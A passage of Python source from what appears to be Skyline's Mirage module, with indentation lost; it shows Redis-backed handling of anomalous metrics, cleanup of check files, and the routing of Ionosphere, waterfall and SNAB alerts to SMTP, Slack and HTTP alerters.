# Branch #3262: py3
# literal_metric_variables = list(self.redis_conn.smembers('mirage.metric_variables'))
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# Handle per process
# literal_metric_variables = list(self.redis_conn_decoded.smembers('mirage.metric_variables'))
metric_variable_redis_set = 'mirage.%s.metric_variables' % str(mirage_process)
literal_metric_variables = list(self.redis_conn_decoded.smembers(metric_variable_redis_set))
for item_list_string in literal_metric_variables:
list_item = literal_eval(item_list_string)
metric_variables.append(list_item)
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
# Handle per process
try:
self.redis_conn.delete(metric_variable_redis_set)
logger.info('deleted Redis set - %s' % metric_variable_redis_set)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % metric_variable_redis_set)
# @added 20191113 - Branch #3262: py3
# Set default values
metric_name = None
metric_value = None
hours_to_resolve = 0
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# for metric_variable in self.metric_variables:
for metric_variable in metric_variables:
if metric_variable[0] == 'metric_name':
metric_name = metric_variable[1]
if metric_variable[0] == 'metric_value':
metric_value = metric_variable[1]
if metric_variable[0] == 'hours_to_resolve':
hours_to_resolve = metric_variable[1]
# if metric_variable[0] == 'metric_timestamp':
# metric_timestamp = metric_variable[1]
logger.info('analysis done - %s' % str(metric_name))
# Send alerts
# Calculate hours second order resolution to seconds
# @modified 20191113 - Branch #3262: py3
# Only if set
if hours_to_resolve:
logger.info('analyzed at %s hours resolution' % hours_to_resolve)
second_order_resolution_seconds = int(hours_to_resolve) * 3600
logger.info('analyzed at %s seconds resolution' % str(second_order_resolution_seconds))
# Remove metric check file
metric_check_file = 'None'
try:
metric_check_file = '%s/%s' % (settings.MIRAGE_CHECK_PATH, processing_check_file)
if LOCAL_DEBUG:
logger.debug('debug :: interpolated metric_check_file to %s' % metric_check_file)
except:
logger.error('error :: failed to interpolate metric_check_file')
if os.path.isfile(metric_check_file):
try:
os.remove(metric_check_file)
logger.info('removed check file - %s' % metric_check_file)
except OSError:
if LOCAL_DEBUG:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove metric_check_file - %s' % metric_check_file)
pass
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove metric_check_file - %s' % metric_check_file)
else:
if LOCAL_DEBUG:
logger.debug('debug :: no metric_check_file to remove OK - %s' % metric_check_file)
# Remove the metric directory
# @modified 20191113 - Branch #3262: py3
# Convert None to str
# timeseries_dir = metric_name.replace('.', '/')
metric_data_dir = 'None'
try:
metric_name_str = str(metric_name)
timeseries_dir = metric_name_str.replace('.', '/')
metric_data_dir = '%s/%s' % (settings.MIRAGE_CHECK_PATH, timeseries_dir)
if LOCAL_DEBUG:
logger.debug('debug :: metric_data_dir interpolated to %s' % str(metric_data_dir))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to interpolate metric_data_dir')
metric_data_dir = 'None'
if os.path.exists(metric_data_dir):
try:
rmtree(metric_data_dir)
logger.info('removed - %s' % metric_data_dir)
except:
logger.error('error :: failed to rmtree %s' % metric_data_dir)
else:
if LOCAL_DEBUG:
logger.debug('debug :: metric_data_dir does not exist - %s' % str(metric_data_dir))
ionosphere_unique_metrics = []
if settings.MIRAGE_ENABLE_ALERTS:
# @added 20161228 - Feature #1830: Ionosphere alerts
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere metrics
try:
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
ionosphere_unique_metrics = list(self.redis_conn_decoded.smembers('ionosphere.unique_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
ionosphere_unique_metrics = []
else:
if LOCAL_DEBUG:
logger.debug('debug :: settings.MIRAGE_ENABLE_ALERTS is not True')
# @added 20161228 - Feature #1830: Ionosphere alerts
# Branch #922: Ionosphere
# Send alerts for Ionosphere
alert_context = 'Mirage'
if ionosphere_alerts_returned:
alert_context = 'Ionosphere'
ionosphere_unique_metrics = []
logger.info('Ionosphere alerts requested emptying ionosphere_unique_metrics so Mirage will alert')
exceptions = dict()
# @modified 20190524 - Branch #3002
# Wrapped in try except
try:
run_timestamp = int(time())
# @modified 20200430 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_alert_on = list(self.redis_conn.scan_iter(match='ionosphere.mirage.alert.*'))
ionosphere_alert_on = list(self.redis_conn_decoded.scan_iter(match='ionosphere.mirage.alert.*'))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.mirage.alert.* from Redis key scan')
ionosphere_alert_on = []
for cache_key in ionosphere_alert_on:
try:
# @modified 20200322 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# alert_on = self.redis_conn.get(cache_key)
alert_on = self.redis_conn_decoded.get(cache_key)
send_alert_for = literal_eval(alert_on)
value = float(send_alert_for[0])
base_name = str(send_alert_for[1])
metric_timestamp = int(float(send_alert_for[2]))
triggered_algorithms = send_alert_for[3]
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
algorithms_run = send_alert_for[5]
second_order_resolution_seconds = int(send_alert_for[4])
# @modified 20201007 - Feature #3772: Add the anomaly_id to the http_alerter json
# Branch #3068: SNAB
# Added triggered_algorithms and algorithms_run
# anomalous_metric = [value, base_name, metric_timestamp, second_order_resolution_seconds]
anomalous_metric = [value, base_name, metric_timestamp, second_order_resolution_seconds, triggered_algorithms, algorithms_run]
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.anomalous_metrics.append(anomalous_metric)
redis_set = 'mirage.anomalous_metrics'
data = str(anomalous_metric)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20210323 - Feature #3642: Anomaly type classification
if LUMINOSITY_CLASSIFY_ANOMALIES:
redis_set = 'luminosity.classify_anomalies'
added_at = int(time())
data_dict = {
'metric': base_name,
'timestamp': int(metric_timestamp),
'value': value,
'algorithms': algorithms_run,
'triggered_algorithms': triggered_algorithms,
'app': skyline_app,
'added_at': added_at,
}
data = [base_name, int(metric_timestamp), added_at, data_dict]
try:
self.redis_conn.sadd(redis_set, str(data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
anomaly_breakdown = dict()
for algorithm in triggered_algorithms:
anomaly_breakdown[algorithm] = 1
self.redis_conn.delete(cache_key)
except:
logger.error(traceback.format_exc())
# @modified 20200322 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# logger.error('error :: failed to add an Ionosphere anomalous_metric for %s' % base_name)
logger.error('error :: failed to add an Ionosphere anomalous_metric for cache key %s' % cache_key)
else:
if LOCAL_DEBUG:
logger.debug('debug :: no ionosphere_alerts_returned - %s' % str(ionosphere_alerts_returned))
# @added 20181114 - Bug #2682: Reduce mirage ionosphere alert loop
# To reduce the amount of I/O used by Mirage in this loop check
# and reduce the number of log entries for 'not alerting - Ionosphere metric'
# a check is made if the metric_name has already been check, if
# so continue
not_alerting_for_ionosphere = 'none'
# @added 20190408 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Only check Ionosphere is up once per cycle
ionosphere_up = False
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
mirage_anomalous_metrics = []
try:
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# literal_mirage_anomalous_metrics = list(self.redis_conn.smembers('mirage.anomalous_metrics'))
literal_mirage_anomalous_metrics = list(self.redis_conn_decoded.smembers('mirage.anomalous_metrics'))
for metric_list_string in literal_mirage_anomalous_metrics:
metric = literal_eval(metric_list_string)
mirage_anomalous_metrics.append(metric)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine list from mirage.anomalous_metrics Redis set')
mirage_anomalous_metrics = []
# @added 20200907 - Feature #3734: waterfall alerts
# Add alert for expired waterfall_alert items
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
waterfall_alert_check_timestamp = int(time())
waterfall_alerts_to_alert_on = []
# A list to add a metric,timestamp string to in order to override
# the ionosphere_metric in the alerting block
alerting_waterfall_alerts = []
waterfall_redis_sets = [
'mirage.waterfall_alerts.sent_to_ionosphere',
]
for waterfall_redis_set in waterfall_redis_sets:
redis_set = waterfall_redis_set
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
logger.info('checking for expired checks in %s waterfall alerts in Redis set %s' % (
str(len(literal_waterfall_alerts)), redis_set))
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert_check_timestamp >= (int(waterfall_alert[3]) + 300):
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item to alert on from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
waterfall_alerts_to_alert_on.append(waterfall_alert)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove feedback metric waterfall alert item for %s from Redis set %s' % (
base_name, redis_set))
for waterfall_alert in waterfall_alerts_to_alert_on:
try:
value = float(waterfall_alert[2])
base_name = str(waterfall_alert[0])
metric_timestamp = int(waterfall_alert[1])
# @added 20201008 - Feature #3734: waterfall alerts
# Branch #3068: SNAB
# Added triggered_algorithms and algorithms_run
algorithms_run = waterfall_alert[4][4]
triggered_algorithms = waterfall_alert[4][5]
# @modified 20201008 - Feature #3734: waterfall alerts
# Branch #3068: SNAB
# Added triggered_algorithms and algorithms_run
# anomalous_metric = [value, base_name, metric_timestamp]
# mirage_anomalous_metrics.append([value, base_name, metric_timestamp])
anomalous_metric = [value, base_name, metric_timestamp, triggered_algorithms, algorithms_run]
mirage_anomalous_metrics.append(anomalous_metric)
waterfall_alert_check_string = '%s.%s' % (str(metric_timestamp), base_name)
alerting_waterfall_alerts.append(waterfall_alert_check_string)
logger.info('waterfall alerting on %s' % base_name)
redis_waterfall_alert_key = 'mirage.waterfall.alert.%s' % waterfall_alert_check_string
try:
self.redis_conn.setex(redis_waterfall_alert_key, 300, waterfall_alert_check_timestamp)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add Redis key - %s for waterfall alert' % (
redis_waterfall_alert_key))
# @added 20200929 - Feature #3734: waterfall alerts
# Task #3748: POC SNAB
# Branch #3068: SNAB
# Added Panorama anomaly details for waterfall alerts
# Note:
# The values are enclosed is single quoted intentionally
# as the imp.load_source used results in a shift in the
# decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
logger.info('adding panorama anomaly file for waterfall alert on %s' % base_name)
panorama_data = None
try:
panorama_data = waterfall_alert[4]
from_timestamp = str(int(panorama_data[2]))
int_metric_timestamp = int(panorama_data[3])
algorithms_run = panorama_data[4]
triggered_algorithms = panorama_data[5]
source = panorama_data[7]
added_at = str(int(time()))
panaroma_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'app = \'%s\'\n' \
'source = \'%s\'\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(value), from_timestamp,
str(int_metric_timestamp), str(algorithms_run),
triggered_algorithms, skyline_app, source,
this_host, added_at)
logger.info('panorama anomaly data for waterfall alert - %s' % str(panorama_data))
# Create an anomaly file with details about the anomaly
sane_metricname = filesafe_metricname(str(base_name))
panaroma_anomaly_file = '%s/%s.%s.txt' % (
settings.PANORAMA_CHECK_PATH, added_at, sane_metricname)
try:
write_data_to_file(
skyline_app, panaroma_anomaly_file, 'w',
panaroma_anomaly_data)
logger.info('added panorama anomaly file for waterfall alert :: %s' % (panaroma_anomaly_file))
except:
logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
logger.error(traceback.format_exc())
redis_set = 'mirage.sent_to_panorama'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add panorama anomaly data file for waterfall alert')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add waterfall alert to alert on to mirage_anomalous_metrics')
# @added 20200913 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
# Info #1792: Shapelet extraction
snab_checks_sent = []
added_to_snab_at = int(time())
# @added 20200929 - Task #3748: POC SNAB
# Branch #3068: SNAB
# Added three-sigma snab.panorama items
panorama_added_at = int(time())
panorama_three_sigma_snab_added = []
# @added 20200610 - Feature #3560: External alert config
external_alerts = {}
external_from_cache = None
internal_alerts = {}
internal_from_cache = None
all_alerts = list(settings.ALERTS)
all_from_cache = None
if EXTERNAL_ALERTS:
try:
external_alerts, external_from_cache, internal_alerts, internal_from_cache, all_alerts, all_from_cache = get_external_alert_configs(skyline_app)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine external alert configs')
logger.info('retrieved %s external_alerts configurations from_cache %s, %s internal_alerts from_cache %s and %s all_alerts from_cache %s' % (
str(len(external_alerts)), str(external_from_cache),
str(len(internal_alerts)), str(internal_from_cache),
str(len(all_alerts)), str(all_from_cache)))
if LOCAL_DEBUG:
logger.debug('debug :: all_alerts :: %s' % str(all_alerts))
if not all_alerts:
logger.error('error :: all_alerts is not set, so creating from settings.ALERTS')
all_alerts = list(settings.ALERTS)
not_ionosphere_metrics = []
# @modified 20200610 - Feature #3560: External alert config
# for alert in settings.ALERTS:
for alert in all_alerts:
# @added 20181114 - Bug #2682: Reduce mirage ionosphere alert loop
not_an_ionosphere_metric_check_done = 'none'
if LOCAL_DEBUG:
logger.debug('debug :: %s metrics in mirage_anomalous_metrics' % str(len(mirage_anomalous_metrics)))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# for metric in self.anomalous_metrics:
for metric in mirage_anomalous_metrics:
# @added 20161228 - Feature #1830: Ionosphere alerts
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere
# metrics if Ionosphere is up
try:
metric_name = '%s%s' % (settings.FULL_NAMESPACE, str(metric[1]))
if LOCAL_DEBUG:
logger.debug('debug :: metric_name interpolated to %s' % str(metric_name))
except:
if LOCAL_DEBUG:
logger.error(traceback.format_exc())
logger.debug('debug :: failed to interpolate metric_name')
# @added 20200907 - Feature #3734: waterfall alerts
waterfall_alert_check_string = '%s.%s' % (str(int(metric[2])), metric[1])
# @modified 20200907 - Feature #3734: waterfall alerts
# if metric_name in ionosphere_unique_metrics:
if metric_name in ionosphere_unique_metrics and waterfall_alert_check_string not in alerting_waterfall_alerts:
# @added 20181114 - Bug #2682: Reduce mirage ionosphere alert loop
if not_alerting_for_ionosphere == metric_name:
continue
# @modified 20190408 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Only check Ionosphere is up once per cycle
# ionosphere_up = False
if not ionosphere_up:
try:
ionosphere_up = self.redis_conn.get('ionosphere')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere key: %s' % str(e))
if ionosphere_up:
# @modified 20190408 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Wrapped this block up on conditional based on
# ionosphere_alerts_returned
if not ionosphere_alerts_returned:
logger.info('not alerting - Ionosphere metric - %s' % str(metric[1]))
# @added 20181114 - Bug #2682: Reduce mirage ionosphere alert loop
not_alerting_for_ionosphere = metric_name
continue
else:
logger.error('error :: Ionosphere not report up')
logger.info('taking over alerting from Ionosphere if alert is matched on - %s' % str(metric[1]))
else:
# @modified 20181114 - Bug #2682: Reduce mirage ionosphere alert loop
# logger.info('not an Ionosphere metric checking whether to alert - %s' % str(metric[1]))
if not_an_ionosphere_metric_check_done == metric_name:
# Do not log multiple times for this either
not_an_ionosphere_metric_check_done = metric_name
else:
if not ionosphere_alerts_returned:
if metric_name not in not_ionosphere_metrics:
logger.info('not an Ionosphere metric checking whether to alert - %s' % str(metric[1]))
not_an_ionosphere_metric_check_done = metric_name
not_ionosphere_metrics.append(metric_name)
# ALERT_MATCH_PATTERN = alert[0]
# METRIC_PATTERN = metric[1]
# @modified 20200622 - Task #3586: Change all alert pattern checks to matched_or_regexed_in_list
# Feature #3512: matched_or_regexed_in_list function
# Changed original alert matching pattern to use new
# method
base_name = str(metric[1])
try:
pattern_match, metric_matched_by = matched_or_regexed_in_list(skyline_app, base_name, [alert[0]])
if LOCAL_DEBUG and pattern_match:
logger.debug('debug :: %s matched alert - %s' % (base_name, alert[0]))
try:
del metric_matched_by
except:
pass
except:
pattern_match = False
if pattern_match:
# @added 20200610 - Feature #3560: External alert config
# @modified 20200624 - Feature #3560: External alert config
# Set the alert key to the external alerter id
# external_alerter_alerter = None
external_alerter_id = None
try:
if alert[4]['type'] == 'external':
# @modified 20200624 - Feature #3560: External alert config
# Set the alert key to the external alerter id
# external_alerter_alerter = alert[4]['alerter']
external_alerter_id = alert[4]['id'].replace('external-', '')
except:
external_alerter_id = None
# @modified 20200610 - Feature #3560: External alert config
# Use the all_alerts list which includes external alert configs
# cache_key = 'mirage.last_alert.%s.%s' % (alert[1], metric[1])
# @modified 20200624 - Feature #3560: External alert config
# Set the alert key to the external alerter id
# if external_alerter_alerter:
# cache_key = 'mirage.last_alert.%s.%s.%s' % (str(external_alerter_alerter), alert[1], metric[1])
if external_alerter_id:
cache_key = 'mirage.last_alert.%s.%s.%s' % (str(external_alerter_id), alert[1], metric[1])
else:
cache_key = 'mirage.last_alert.%s.%s' % (alert[1], metric[1])
try:
# @modified 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Changed the last_alert cache key to hold the last
# anomaly timestamp
# last_alert = self.redis_conn.get(cache_key)
last_alert = self.redis_conn_decoded.get(cache_key)
# @added 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Evaluate the reported anomaly timestamp to determine whether
# EXPIRATION_TIME should be applied to a batch metric
if last_alert:
# Is this a analyzer_batch related anomaly
analyzer_batch_anomaly = None
metric_timestamp = metric[2]
analyzer_batch_metric_anomaly_key = 'analyzer_batch.anomaly.%s.%s' % (
str(metric_timestamp), metric[1])
try:
analyzer_batch_anomaly = self.redis_conn_decoded.get(analyzer_batch_metric_anomaly_key)
except Exception as e:
logger.error(
'error :: could not query cache_key - %s - %s' % (
analyzer_batch_metric_anomaly_key, e))
analyzer_batch_anomaly = None
if analyzer_batch_anomaly:
logger.info('identified as an analyzer_batch triggered anomaly from the presence of the Redis key %s' % analyzer_batch_metric_anomaly_key)
else:
logger.info('not identified as an analyzer_batch triggered anomaly as no Redis key found - %s' % analyzer_batch_metric_anomaly_key)
if last_alert and analyzer_batch_anomaly:
last_timestamp = None
try:
last_timestamp = int(last_alert)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine last_timestamp from the last Mirage alert key - %s' % cache_key)
last_timestamp = None
seconds_between_batch_anomalies = None
if last_timestamp:
try:
seconds_between_batch_anomalies = int(metric_timestamp) - int(last_timestamp)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine seconds_between_batch_anomalies for batch metric Panorama key- %s' % cache_key)
last_timestamp = None
if seconds_between_batch_anomalies:
if seconds_between_batch_anomalies > int(alert[2]):
logger.info('the difference between the last anomaly timestamp (%s) and the batch anomaly timestamp (%s) for batch metric %s is greater than the metric EXPIRATION_TIME of %s' % (
str(last_timestamp), str(metric_timestamp), metric[1],
str(alert[2])))
logger.info('alerting on anomaly for batch metric %s, so setting last_alert to None' % (
metric))
last_alert = None
else:
logger.info('the difference between the last anomaly timestamp (%s) and the batch anomaly timestamp (%s) for batch metric %s is less than the metric EXPIRATION_TIME of %s, not alerting' % (
str(last_timestamp), str(metric_timestamp), metric[1],
str(alert[2])))
# @added 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Task #3562: Change panorama.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# If the metric is a batch processing metric and the anomaly
# timestamp is less than the last_check timestamp, insert
# the anomaly
if int(metric_timestamp) < last_timestamp:
logger.info('batch anomaly timestamp (%s) less than the last_check timestamp (%s), alerting on anomaly for batch metric %s, so setting last_alert to None' % (
str(metric_timestamp), str(last_timestamp), metric))
last_alert = None
if not last_alert:
if ionosphere_alerts_returned:
# @modified 20190410 - Feature #2882: Mirage - periodic_check
# Only set if not set
try:
second_order_resolution_seconds + 1
set_second_order_resolution_seconds = False
except:
set_second_order_resolution_seconds = True
if set_second_order_resolution_seconds:
try:
second_order_resolution_seconds = int(metric[3]) * 3600
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine full_duration from the Ionosphere alert for %s' % (metric[1]))
logger.info('using settings.FULL_DURATION - %s' % (str(settings.FULL_DURATION)))
second_order_resolution_seconds = int(settings.FULL_DURATION)
# @modified 20190524 - Branch #3002
# Wrapped in try except
try:
# @modified 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Change the last_alert cache key to hold the
# the anomaly timestamp for which the alert
# was sent, not the packb anomaly value.
# Using the timestamp of the anomaly allows
# it to be used to determine if a batch
# anomaly should be alerted on based on the
# comparison of the timestamps rather than
# just the presence of the last_alert key
# based on it not having reach its TTL as
# analyzer_batch could send multiple
# anomalies in one batch that might be
# EXPIRATION_TIME apart.
# self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
self.redis_conn.setex(cache_key, str(alert[2]), int(metric[2]))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to set Redis key %s for %s' % (
str(cache_key), metric[1]))
# @added 20200929 - Task #3748: POC SNAB
# Branch #3068: SNAB
# Determine if this is a snab_check_metric so
# that info can be passed to the alerter
snab_check_metric = False
if SNAB_ENABLED:
for app in SNAB_CHECKS:
if app == skyline_app:
for snab_context in SNAB_CHECKS[app]:
if snab_check_metric:
break
if snab_context == 'testing':
for algorithm in SNAB_CHECKS[app][snab_context]:
try:
algorithm_source = SNAB_CHECKS[app][snab_context][algorithm]['algorithm_source']
except:
break
if not os.path.isfile(algorithm_source):
break
try:
for namespace in SNAB_CHECKS[app][snab_context][algorithm]['namespaces']:
if namespace in base_name:
snab_check_metric = True
break
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check if %s is a snab_check_metric' % base_name)
if snab_check_metric:
algorithm_group = 'three-sigma'
# @added 20201007 - Feature #3772: Add the anomaly_id to the http_alerter json
# Branch #3068: SNAB
# Added second_order_resolution_seconds, triggered_algorithms and algorithms_run
try:
triggered_algorithms = metric[4]
algorithms_run = metric[5]
except:
triggered_algorithms = []
algorithms_run = []
# @added 20201001 - Task #3748: POC SNAB
# Added anomalyScore
try:
if triggered_algorithms and algorithms_run:
anomalyScore = len(triggered_algorithms) / len(algorithms_run)
else:
anomalyScore = 1.0
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine anomalyScore for %s' % base_name)
anomalyScore = 1.0
# @added 20201001 - Branch #3068: SNAB
# Task #3748: POC SNAB
# Added analysis_run_time
analysis_run_time = 0
redis_key = 'mirage.analysis_run_time.%s.%s' % (base_name, str(metric[2]))
try:
analysis_run_time_data = self.redis_conn_decoded.get(redis_key)
if analysis_run_time_data:
analysis_run_time = float(analysis_run_time_data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine analysis_run_time from Redis key - %s' % (
redis_key))
try:
snab_panorama_details = {
'metric': base_name,
'timestamp': int(metric[2]),
# @added 20201001 - Task #3748: POC SNAB
# Added anomalyScore and analysis_run_time
'anomalyScore': anomalyScore,
'analysis_run_time': analysis_run_time,
'source': skyline_app,
'algorithm_group': algorithm_group,
'algorithm': None,
'added_at': panorama_added_at,
}
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to create snab_panorama_details dict %s' % base_name)
snab_panorama_details = None
# Only send once for a metric and timestamp
if snab_panorama_details not in panorama_three_sigma_snab_added:
self.redis_conn.sadd('snab.panorama', str(snab_panorama_details))
logger.info('added snab.panorama three-sigma item - %s' % (
str(snab_panorama_details)))
panorama_three_sigma_snab_added.append(snab_panorama_details)
# trigger_alert(alert, metric, second_order_resolution_seconds, context)
try:
# @added 20210409 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Always determine triggered_algorithms and
# calculate anomalyScore
try:
triggered_algorithms = metric[4]
algorithms_run = metric[5]
except:
triggered_algorithms = []
algorithms_run = []
try:
if triggered_algorithms and algorithms_run:
anomalyScore = len(triggered_algorithms) / len(algorithms_run)
else:
anomalyScore = 1.0
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine anomalyScore for %s' % base_name)
anomalyScore = 1.0
if alert[1] != 'smtp':
new_alert = None
# @added 20201007 - Feature #3772: Add the anomaly_id to the http_alerter json
if 'http_alerter' in alert[1]:
anomaly_id = None
anomaly_id_redis_key = 'panorama.anomaly_id.%s.%s' % (
str(int(metric[2])), base_name)
try_get_anomaly_id_redis_key_count = 0
while try_get_anomaly_id_redis_key_count < 20:
try_get_anomaly_id_redis_key_count += 1
try:
anomaly_id = int(self.redis_conn_decoded.get(anomaly_id_redis_key))
break
except:
sleep(1)
if not anomaly_id:
logger.error('error :: failed to determine anomaly_id from Redis key - %s' % anomaly_id_redis_key)
else:
logger.info('determined anomaly_id as %s, appending to alert' % str(anomaly_id))
# Do not modify the alert list object, create a new one
new_alert = list(alert)
new_alert.append(['anomaly_id', anomaly_id])
# @added 20201130 - Feature #3772: Add the anomaly_id to the http_alerter json
# Determine the triggered_algorithms
# and algorithms_run
try:
triggered_algorithms = metric[4]
algorithms_run = metric[5]
except:
triggered_algorithms = []
algorithms_run = []
# @added 20201111 - Feature #3772: Add the anomaly_id to the http_alerter json
# Add the real anomalyScore
try:
if triggered_algorithms and algorithms_run:
anomalyScore = len(triggered_algorithms) / len(algorithms_run)
else:
anomalyScore = 1.0
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine anomalyScore for %s' % base_name)
anomalyScore = 1.0
new_alert.append(['anomalyScore', anomalyScore])
# @added 20200929 - Task #3748: POC SNAB
# Branch #3068: SNAB
# Determine if this is a snab_check_metric so
# that info can be passed to the alerter
if SNAB_ENABLED and snab_check_metric:
if alert[1] == 'slack':
anomaly_id = None
snab_id = None
snab_details = None
anomaly_id_redis_key = 'panorama.anomaly_id.%s.%s' % (
str(int(metric[2])), base_name)
try_get_anomaly_id_redis_key_count = 0
while try_get_anomaly_id_redis_key_count < 20:
try_get_anomaly_id_redis_key_count += 1
try:
anomaly_id = int(self.redis_conn_decoded.get(anomaly_id_redis_key))
break
except:
sleep(1)
if not anomaly_id:
logger.error('error :: failed to determine anomaly_id from Redis key - %s' % anomaly_id_redis_key)
if anomaly_id:
# snab_id_redis_key = 'snab.id.%s.%s.%s.%s' % (algorithm_group, str(metric_timestamp), base_name, panorama_added_at)
snab_id_redis_key = 'snab.id.%s.%s.%s.%s' % (algorithm_group, str(int(metric[2])), base_name, panorama_added_at)
try_get_snab_id_redis_key_count = 0
while try_get_snab_id_redis_key_count < 20:
try_get_snab_id_redis_key_count += 1
try:
snab_id = int(self.redis_conn_decoded.get(snab_id_redis_key))
break
except:
sleep(1)
if not snab_id:
logger.error('error :: failed to determine snab_id from Redis key - %s' % snab_id_redis_key)
snab_details = ['snab_details', snab_id, anomaly_id, anomalyScore]
# Do not modify the alert list object, create a new one
new_alert = list(alert)
new_alert.append(snab_details)
# @modified 20201008 - Feature #3772: Add the anomaly_id to the http_alerter json
# Feature #3734: waterfall alerts
# Branch #3068: SNAB
# Use the appropriate alert context
if new_alert:
logger.info('trigger_alert :: alert: %s, metric: %s, second_order_resolution_seconds: %s, context: %s' % (
str(new_alert), str(metric),
str(second_order_resolution_seconds),
str(alert_context)))
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
trigger_alert(new_alert, metric, second_order_resolution_seconds, alert_context, triggered_algorithms)
else:
logger.info('trigger_alert :: alert: %s, metric: %s, second_order_resolution_seconds: %s, context: %s' % (
str(alert), str(metric),
str(second_order_resolution_seconds),
str(alert_context)))
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
trigger_alert(alert, metric, second_order_resolution_seconds, alert_context, triggered_algorithms)
else:
logger.info('smtp_trigger_alert :: alert: %s, metric: %s, second_order_resolution_seconds: %s, context: %s' % (
str(alert), str(metric),
str(second_order_resolution_seconds),
str(alert_context)))
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
smtp_trigger_alert(alert, metric, second_order_resolution_seconds, alert_context, triggered_algorithms)
logger.info('sent %s alert: For %s' % (alert[1], metric[1]))
except Exception as e:
logger.error('error :: could not send %s alert for %s: %s' % (alert[1], metric[1], e))
# @added 20200913 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
# Info #1792: Shapelet extraction
if SNAB_ENABLED:
